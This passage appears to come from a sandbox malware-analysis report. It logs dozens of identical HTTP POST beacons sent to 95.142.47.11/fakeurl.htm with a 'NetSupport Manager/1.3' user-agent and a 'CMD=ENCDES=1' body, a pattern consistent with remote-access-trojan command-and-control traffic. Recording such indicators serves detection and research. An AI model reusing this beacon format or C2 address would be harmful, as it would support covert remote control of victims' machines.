                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:45.503787041 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:45.604743004 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:45.706012964 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:47.243053913 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:47.343669891 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:47.443666935 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:47.544688940 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:47.645848036 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:47.745601892 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:47.845864058 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:47.946621895 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:48.047732115 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:48.147636890 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:48.248769999 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:48.349661112 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:48.449575901 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:48.550765991 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:48.650700092 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:48.750885963 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:48.852421045 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:48.952632904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:49.058881998 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:49.158787012 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:49.259780884 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:49.361124992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:49.460587978 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:49.561867952 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:49.662993908 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:49.762968063 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:49.863616943 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:49.963891029 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:50.064683914 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:50.164800882 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:50.265599012 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:50.365945101 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:50.466605902 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:50.566598892 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:50.666605949 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:50.766774893 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:50.866631985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:50.967573881 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:51.067996979 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:51.167889118 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:51.268573046 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:51.369724989 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:51.469863892 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:51.570694923 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:51.670658112 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:51.771573067 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:51.871618032 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:51.971623898 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:52.072854042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:52.172660112 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:52.272671938 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:52.373604059 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:52.474643946 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:52.574811935 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:52.675842047 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:52.776575089 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:52.876816988 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:52.977576971 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:53.077862024 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:53.178627014 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:53.279683113 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:53.379637957 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:53.480643988 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:53.580646038 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:53.681648970 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:53.781610966 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:53.882721901 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:53.983722925 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
